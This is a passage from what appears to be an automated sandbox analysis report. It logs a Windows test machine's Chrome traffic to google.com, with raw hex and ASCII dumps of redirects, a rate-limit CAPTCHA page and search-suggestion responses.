NID=513=irRFUUIJFTw_X5vpGLyxNvjQ9lchlx96W2dFZ55OuLCLz6OAMx0ZChLKYWEmc7DJIz9qvPHZKcKrD_cp_Nu_SmSjzyQLeI0P2KT7rTufjJ_cjA2GUdoNR7K3XuwX4_yU_ilvq8K0Ck-50ZvOefEBewlxLXWhTzyb0vrnlzTubcM; expires=Fri, 01-Nov-2024 13:05:58 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 13:05:59 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49735	142.251.32.100	443	7504	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 13:06:00 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-02 13:06:00 UTC	1249	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGLifzrEGIjAtAotW97xiDhn6fwnyvQS7r43dpv7E1GI8YkXR8lHG-pScMOWVMJEg8fQ1Eg1M3M4yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIuJ_OsQYQ_rHdtAMSBL9gluE Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Thu, 02 May 2024 13:06:00 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-05-02-13; expires=Sat, 01-Jun-2024 13:06:00 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=XfXV4_tsLPb6EjW6TVfsKn-ZgtB4UhCNxFBqj-b0yxPVScwjuwN2NcTb1-gHst4PYm3HzPo4t9ndFw7SoXtrkpmSxptWu7n5PzzOZ3Qf57iMOVZNeg_M3XDxL2A5O6ZgR-iNgDFm06y0Qis0KL_8PqzkuJMzAVPq5gZ28u_0vPQ; expires=Fri, 01-Nov-2024 13:06:00 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 13:06:00 UTC	6	IN	Data Raw: 3c 48 54 4d 4c 3e Data Ascii: <HTML>
2024-05-02 13:06:00 UTC	411	IN	Data Raw: 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 61 6d 70 3b 71 3d Data Ascii: <HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49736	142.251.32.100	443	7504	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 13:06:00 UTC	912	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGLafzrEGIjBT_EUKA1u8_t9vjN9UnmJR1K8IADZGF2jLdWpWbLfOyPU11p8YoYWauUFitc_MPvgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: 1P_JAR=2024-05-02-13; NID=513=irRFUUIJFTw_X5vpGLyxNvjQ9lchlx96W2dFZ55OuLCLz6OAMx0ZChLKYWEmc7DJIz9qvPHZKcKrD_cp_Nu_SmSjzyQLeI0P2KT7rTufjJ_cjA2GUdoNR7K3XuwX4_yU_ilvq8K0Ck-50ZvOefEBewlxLXWhTzyb0vrnlzTubcM
2024-05-02 13:06:01 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Thu, 02 May 2024 13:06:01 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3185 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 13:06:01 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-05-02 13:06:01 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 36 73 71 31 42 6d 6d 67 78 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="6sq1Bmmgx
2024-05-02 13:06:01 UTC	1031	IN	Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49737	142.251.32.100	443	7504	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 13:06:00 UTC	607	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-02 13:06:01 UTC	1191	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 13:06:01 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-YfoXsM3FuqN8TUb9-Uq2Zg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-05-02 13:06:01 UTC	64	IN	Data Raw: 36 63 63 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 66 6c 20 64 72 61 66 74 22 2c 22 66 20 31 36 20 63 72 61 73 68 20 68 6f 6c 6c 6f 6d 61 6e 20 61 66 62 22 2c 22 6a 65 6f 70 61 72 64 79 20 6d Data Ascii: 6cc)]}'["",["nfl draft","f 16 crash holloman afb","jeopardy m
2024-05-02 13:06:01 UTC	1255	IN	Data Raw: 61 73 74 65 72 73 20 74 6f 75 72 6e 61 6d 65 6e 74 22 2c 22 66 75 62 6f 20 64 69 73 63 6f 76 65 72 79 20 6e 65 74 77 6f 72 6b 73 22 2c 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 61 6c 61 72 6d 73 22 2c 22 73 68 65 6c 62 79 20 68 65 77 69 74 74 22 2c 22 6d 65 65 6e 61 20 61 6c 65 78 61 6e 64 65 72 20 70 6f 65 6d 73 22 2c 22 6e 62 61 20 62 6f 73 74 6f 6e 20 63 65 6c 74 69 63 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 Data Ascii: asters tournament","fubo discovery networks","apple iphone alarms","shelby hewitt","meena alexander poems","nba boston celtics"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2Vhc
2024-05-02 13:06:01 UTC	428	IN	Data Raw: 67 79 55 46 70 54 56 32 6b 7a 4d 48 49 32 52 54 63 77 64 6e 52 79 55 31 68 56 63 6c 4e 78 52 6b 70 4e 51 31 4e 4a 53 45 30 35 4b 30 31 68 55 47 4a 68 53 30 64 44 4e 7a 59 76 61 55 6c 77 62 30 35 35 54 58 67 32 56 45 78 57 56 79 73 79 54 47 52 4a 54 6a 5a 58 52 57 70 6e 62 57 6c 57 62 6a 4e 46 4e 48 67 33 4e 6a 5a 47 52 6d 4a 70 4d 6b 4e 78 4e 6e 46 44 62 33 64 72 4d 47 6c 7a 4c 31 64 6a 57 6d 74 6d 56 46 52 6b 4d 48 59 77 5a 6d 4a 4d 4d 32 45 7a 53 7a 4a 79 64 56 51 35 52 79 74 77 55 33 5a 44 59 56 4e 75 59 32 74 44 5a 47 38 7a 51 30 70 50 5a 56 6c 71 55 79 39 6b 53 30 4a 77 54 6e 68 6a 56 46 52 4b 53 30 64 56 4e 47 68 61 53 47 78 4a 53 6b 4e 6f 55 48 56 45 63 53 39 49 4e 45 78 74 53 32 64 75 62 45 74 79 4d 57 46 77 55 58 68 48 4f 48 42 44 61 6e 51 32 54 Data Ascii: gyUFpTV2kzMHI2RTcwdnRyU1hVclNxRkpNQ1NJSE05K01hUGJhS0dDNzYvaUlwb055TXg2VExWVysyTGRJTjZXRWpnbWlWbjNFNHg3NjZGRmJpMkNxNnFDb3drMGlzL1djWmtmVFRkMHYwZmJMM2EzSzJydVQ5RytwU3ZDYVNuY2tDZG8zQ0pPZVlqUy9kS0JwTnhjVFRKS0dVNGhaSGxJSkNoUHVEcS9INExtS2dubEtyMWFwUXhHOHBDanQ2T
2024-05-02 13:06:01 UTC	1255	IN	Data Raw: 31 63 36 35 0d 0a 52 44 6c 4d 56 30 4e 6e 5a 56 56 6f 59 6d 70 35 62 58 46 6f 55 31 56 54 63 45 31 43 55 47 78 72 5a 32 64 4b 54 7a 64 6e 51 57 4e 6d 63 58 68 79 4d 33 42 6c 62 46 68 53 57 45 38 31 54 6c 56 30 56 57 68 4e 55 45 78 68 4d 6b 39 4f 4e 7a 42 69 52 56 4a 44 4f 45 56 61 4c 33 70 4a 4b 32 56 6c 5a 46 6f 79 56 47 31 58 57 6b 6c 61 52 44 63 31 65 6c 64 76 65 46 56 76 53 31 41 33 4d 6b 31 57 4d 54 4a 73 65 54 46 59 63 46 5a 44 4d 47 64 4a 55 32 68 5a 56 58 64 30 53 6d 35 42 65 6b 55 30 62 6d 74 6d 5a 6c 52 74 4d 7a 46 49 56 47 38 32 5a 58 46 74 4d 7a 46 7a 62 31 56 72 54 47 4a 52 52 32 78 69 62 6b 4e 57 65 55 35 35 61 43 39 34 55 30 5a 55 65 45 31 34 4d 6b 64 78 53 46 68 30 63 33 42 34 55 6b 6c 78 4e 46 56 31 63 56 55 34 52 58 56 51 52 54 56 56 53 Data Ascii: 1c65RDlMV0NnZVVoYmp5bXFoU1VTcE1CUGxrZ2dKTzdnQWNmcXhyM3BlbFhSWE81TlV0VWhNUExhMk9ONzBiRVJDOEVaL3pJK2VlZFoyVG1XWklaRDc1eldveFVvS1A3Mk1WMTJseTFYcFZDMGdJU2hZVXd0Sm5BekU0bmtmZlRtMzFIVG82ZXFtMzFzb1VrTGJRR2xibkNWeU55aC94U0ZUeE14MkdxSFh0c3B4UklxNFV1cVU4RXVQRTVVS
2024-05-02 13:06:01 UTC	1255	IN	Data Raw: 33 70 36 52 57 56 74 61 47 78 74 64 55 35 69 55 6b 68 33 4d 58 5a 4d 5a 46 6f 7a 51 57 78 76 63 45 4a 4b 56 6a 4a 6e 4f 44 6c 6f 4b 33 63 33 4e 6b 52 71 53 30 74 47 4d 46 42 4e 55 6d 31 52 56 47 4e 6c 53 57 4a 34 64 44 5a 77 63 56 68 48 4e 6c 4a 32 57 54 52 52 51 58 5a 6a 61 30 45 34 53 44 45 77 5a 30 39 57 52 6c 59 34 55 57 46 6e 63 46 4e 49 4d 30 4e 52 64 6c 6c 74 52 58 46 53 4f 43 39 75 4c 32 5a 55 59 6a 46 6c 4e 47 63 77 54 6b 35 56 56 58 4a 77 59 32 4a 6a 4d 6d 78 4c 56 6b 70 6e 5a 32 74 49 51 6d 6f 32 5a 57 35 6d 55 32 64 47 62 46 70 72 62 6e 52 78 4f 54 5a 31 53 33 64 50 53 6a 5a 74 64 32 5a 42 53 30 34 35 56 44 56 53 4e 79 74 4c 5a 58 5a 4d 54 6c 42 52 4d 44 6c 36 52 6c 46 51 4d 45 31 4f 64 45 35 35 4e 45 35 76 62 6b 4a 54 61 46 49 30 52 33 46 57 Data Ascii: 3p6RWVtaGxtdU5iUkh3MXZMZFozQWxvcEJKVjJnODloK3c3NkRqS0tGMFBNUm1RVGNlSWJ4dDZwcVhHNlJ2WTRRQXZja0E4SDEwZ09WRlY4UWFncFNIM0NRdlltRXFSOC9uL2ZUYjFlNGcwTk5VVXJwY2JjMmxLVkpnZ2tIQmo2ZW5mU2dGbFprbnRxOTZ1S3dPSjZtd2ZBS045VDVSNytLZXZMTlBRMDl6RlFQME1OdE55NE5vbkJTaFI0R3FW
2024-05-02 13:06:01 UTC	1255	IN	Data Raw: 42 51 55 46 42 5a 32 74 70 62 55 35 36 53 55 46 6f 56 57 39 42 5a 55 52 54 63 45 39 45 54 55 46 70 52 58 4e 42 5a 6a 42 51 61 7a 56 50 55 33 4e 50 56 46 4e 35 63 33 4a 4c 56 32 78 77 59 69 39 31 57 57 4e 42 5a 6d 74 42 51 57 64 72 55 55 46 6c 65 6e 4a 45 64 7a 68 50 63 6e 45 32 64 56 5a 4e 55 7a 4a 72 63 45 74 55 64 6a 63 72 4c 7a 64 7a 4e 46 42 4d 65 48 4e 72 51 55 35 6e 51 55 46 6c 51 79 39 68 4d 6e 52 79 54 33 70 7a 4e 6a 68 32 54 48 70 69 4e 6b 39 42 51 55 5a 52 51 6e 56 4b 55 30 64 31 54 58 70 4a 51 57 52 45 64 48 6c 42 51 55 4e 56 61 7a 46 4a 51 56 68 53 4b 32 74 6b 56 6c 70 53 62 57 35 47 64 32 64 49 5a 6c 4a 73 62 54 42 34 61 6c 5a 31 56 57 46 72 4d 32 35 77 57 47 74 42 54 48 64 43 4e 57 56 59 62 6b 77 30 5a 46 46 42 53 48 64 44 57 58 59 32 61 44 Data Ascii: BQUFBZ2tpbU56SUFoVW9BZURTcE9ETUFpRXNBZjBQazVPU3NPVFN5c3JLV2xwYi91WWNBZmtBQWdrUUFlenJEdzhPcnE2dVZNUzJrcEtUdjcrLzdzNFBMeHNrQU5nQUFlQy9hMnRyT3pzNjh2THpiNk9BQUZRQnVKU0d1TXpJQWREdHlBQUNVazFJQVhSK2tkVlpSbW5Gd2dIZlJsbTB4alZ1VWFrM25wWGtBTHdCNWVYbkw0ZFFBSHdDWXY2aD
2024-05-02 13:06:01 UTC	1255	IN	Data Raw: 6c 4e 53 6d 78 47 51 7a 59 35 63 6b 68 71 62 46 64 42 64 30 52 78 61 6d 64 4a 4d 55 46 79 4e 32 35 30 51 55 4e 59 4d 48 64 48 62 6c 63 77 51 58 70 57 59 32 5a 76 54 48 68 47 52 58 4a 72 4e 55 64 49 63 6b 6c 32 56 45 77 31 5a 56 59 30 52 56 42 36 52 32 63 34 64 44 64 31 4e 33 51 35 53 32 74 74 4d 79 38 76 57 6c 56 6c 53 6c 6f 76 4f 48 46 54 59 33 68 36 61 6d 70 4e 55 31 6c 48 56 58 59 31 4b 79 39 52 53 6c 55 7a 4c 32 49 33 62 57 51 76 5a 32 38 72 56 6d 64 6a 52 6d 5a 4c 53 47 4a 57 64 30 6c 71 63 6b 38 30 4d 33 64 34 63 6a 4a 4a 63 30 68 79 62 6d 68 6a 62 31 70 53 56 30 5a 6c 59 32 6b 35 5a 32 49 32 5a 6d 64 6c 62 31 42 61 4f 48 6b 76 53 44 42 30 56 6c 5a 43 59 56 64 75 4d 56 64 47 61 33 52 6f 63 33 5a 47 53 57 6f 30 4b 31 46 4e 53 58 46 6e 51 31 42 4a 62 Data Ascii: lNSmxGQzY5ckhqbFdBd0RxamdJMUFyN250QUNYMHdHblcwQXpWY2ZvTHhGRXJrNUdIckl2VEw1ZVY0RVB6R2c4dDd1N3Q5S2ttMy8vWlVlSlovOHFTY3h6ampNU1lHVXY1Ky9RSlUzL2I3bWQvZ28rVmdjRmZLSGJWd0lqck80M3d4cjJJc0hybmhjb1pSV0ZlY2k5Z2I2Zmdlb1BaOHkvSDB0VlZCYVduMVdGa3Roc3ZGSWo0K1FNSXFnQ1BJb
2024-05-02 13:06:01 UTC	1255	IN	Data Raw: 56 4d 33 54 44 4e 5a 56 7a 4e 32 4e 47 68 77 53 33 55 7a 59 6e 4e 51 53 48 56 48 62 33 68 4d 55 31 68 6f 64 55 51 79 59 30 56 73 56 58 46 4c 54 33 52 4b 53 6b 6b 31 56 47 35 4d 54 30 35 51 61 6c 6c 73 62 6a 5a 6d 59 54 6c 71 52 45 78 4e 4d 57 31 53 65 56 4e 36 63 30 31 57 54 7a 41 32 5a 48 56 47 65 48 68 33 65 46 4e 6b 62 45 4d 72 4d 47 74 72 56 30 56 76 4d 57 52 35 4e 55 4a 75 4d 47 74 6e 4e 79 74 6f 4d 32 4a 51 64 45 78 71 55 56 64 44 4b 32 78 36 61 46 5a 49 53 32 74 52 63 47 64 34 53 56 68 58 59 57 70 59 65 6b 68 51 55 58 56 30 53 30 78 53 62 30 52 46 61 56 68 6d 51 6b 74 53 62 6d 39 4c 62 6c 6c 4e 62 54 4a 5a 4b 32 46 34 55 57 6c 55 51 30 67 72 54 32 4e 4e 59 32 56 4f 56 32 6c 32 4d 48 64 45 56 58 63 34 59 57 38 72 4d 46 70 36 52 54 5a 51 55 45 4e 51 Data Ascii: VM3TDNZVzN2NGhwS3UzYnNQSHVHb3hMU1hodUQyY0VsVXFLT3RKSkk1VG5MT05QallsbjZmYTlqRExNMW1SeVN6c01WTzA2ZHVGeHh3eFNkbEMrMGtrV0VvMWR5NUJuMGtnNytoM2JQdExqUVdDK2x6aFZIS2tRcGd4SVhXYWpYekhQUXV0S0xSb0RFaVhmQktSbm9LbllNbTJZK2F4UWlUQ0grT2NNY2VOV2l2MHdEVXc4YW8rMFp6RTZQUENQ
2024-05-02 13:06:01 UTC	1002	IN	Data Raw: 64 6c 46 35 52 57 46 6c 59 6d 6c 44 63 55 35 6e 65 6d 39 35 64 30 30 72 4f 48 56 6c 53 6b 70 78 4d 6c 42 4d 4e 44 5a 72 5a 45 35 44 59 6d 46 33 64 6e 4d 34 53 44 49 72 54 6b 68 54 53 6c 6c 52 4d 32 38 77 61 32 4e 33 55 6c 4a 70 62 33 46 69 53 57 4a 6a 5a 57 70 77 63 58 6c 4f 53 47 74 54 52 43 38 30 5a 58 56 42 56 45 6f 76 52 31 6c 74 53 32 6c 34 4d 57 5a 32 64 6e 52 6d 4e 6e 52 68 4d 31 56 59 5a 55 6c 30 53 6a 42 36 4b 31 42 71 4c 33 49 33 65 6a 42 68 53 54 4e 7a 57 6a 41 79 52 54 55 76 64 58 59 77 4e 6b 56 49 61 32 68 50 62 6c 4e 59 4d 30 35 77 61 31 70 36 59 56 4e 59 54 44 46 72 64 6c 42 56 63 33 64 34 4d 31 51 76 65 57 56 75 63 45 51 78 55 7a 5a 79 4f 56 49 76 65 6b 46 55 54 31 46 50 4b 32 74 57 4d 45 74 6d 55 57 64 4d 63 47 35 55 56 53 74 33 54 6c 4e Data Ascii: dlF5RWFlYmlDcU5nem95d00rOHVlSkpxMlBMNDZrZE5DYmF3dnM4SDIrTkhTSllRM28wa2N3UlJpb3FiSWJjZWpwcXlOSGtTRC80ZXVBVEovR1ltS2l4MWZ2dnRmNnRhM1VYZUl0SjB6K1BqL3I3ejBhSTNzWjAyRTUvdXYwNkVIa2hPblNYM05wa1p6YVNYTDFrdlBVc3d4M1QveWVucEQxUzZyOVIvekFUT1FPK2tWMEtmUWdMcG5UVSt3TlN
2024-05-02 13:06:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49738	142.251.32.100	443	7504	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
